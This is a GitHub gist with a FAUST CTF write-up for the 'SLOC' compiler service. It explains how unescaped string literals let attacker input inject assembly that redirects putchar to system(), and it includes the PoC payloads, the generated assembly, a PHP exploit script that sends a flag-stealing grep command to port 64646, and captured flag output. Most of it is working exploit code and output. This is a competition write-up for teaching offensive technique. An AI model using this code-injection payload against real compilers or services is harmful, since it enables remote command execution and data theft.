Skip to content

Instantly share code, notes, and snippets.

@v0s
Last active May 30, 2019 12:59
Show Gist options
  • Save v0s/4a5eee6630d06367a1032a4b02607cfd to your computer and use it in GitHub Desktop.
Save v0s/4a5eee6630d06367a1032a4b02607cfd to your computer and use it in GitHub Desktop.
FAUST CTF SLOC writeup

FAUST CTF SLOC writeup

The challenge features a custom language compiler/preprocessor that generates GNU ASM source, compiles it and executes the resulting binary.

First bug that we exploited was an RCE leveraging non-escaped strings in generated assembly code.

SLOC source code that triggers the vulnerability:

CALL WRITECHAR "id\x00\"
CALL WRITECHAR ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"

([\r] should be replaced by the real \x0D characters — they will serve as whitespace for GAS)

Generated assembly code:

.global main
.text
main:
push %rbp
mov %rsp, %rbp
sub $0, %rsp
leaq string0(%rip), %rdi
call putchar@PLT
leaq string1(%rip), %rdi
call putchar@PLT
xor %rax, %rax
mov %rbp, %rsp
pop %rbp
ret

string0:
.asciz "id\x00\"
string1:
.asciz ";string1:putchar:call[\r]system@PLT;call[\r]exit@PLT;#"

Let's re-format the bottom part slightly for it to be more obvious:

string0:
.asciz "id\x00\"\nstring1:\n.asciz "

string1:
  putchar:
    call system@PLT
    call exit@PLT
#"

Thanks to \ injected in the string0, we break out of string literal, define putchar label that will be called instead of library function, and make it run our shell command.

The original PoC SLOC code and exploit code attached.

root@voshiba:~# ./splo.php 127.0.0.1
Welcome to SLOC - your Simple Language Online Compiler

What do you want to do?
1 <size>\n<code (size bytes)  Compiles and runs your program
                              Prints the result and gives you an (id, pwd)
                              to get your out again later
2 <id> <pwd>                  Shows to result of the given run again
3                             Lists all recent run ids

runs/bla:FAUST_blablablablaba
runs/test:FAUST_qweyqwieuywqiue
runs/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
runs/tmpxdkw8t_o3XO3TRUHN6CCAM2S:RX7QZWZIW66BDRNOruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiueruns/tmp9mvowjqlNJVA4CK2VDQOY4RW:ZDZMLJV2YT674HGUruns/bla:FAUST_blablablablabaruns/test:FAUST_qweyqwieuywqiue
SUCC: Submission stored with id tmpcq_f5drkENYXKHEYE3AB6QW3 and pwd 3RUVNHAASYEWXGEA
#!/usr/bin/php
<?php
$payload = file_get_contents("test.sl");
$ip = $argv[1];
$s = fsockopen($ip, 64646, $nul, $nul, 3);
if (!$s) {
exit;
}
fwrite($s, "1 " . strlen($payload) . "\n" . $payload);
pcntl_alarm(5);
while (!feof($s)) {
echo fgetc($s);
}
CALL WRITECHAR "grep\x20-r\x20.AUST\x20runs/\x00\"
CALL WRITECHAR ";string1:putchar: call system@PLT; call exit@PLT; #"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment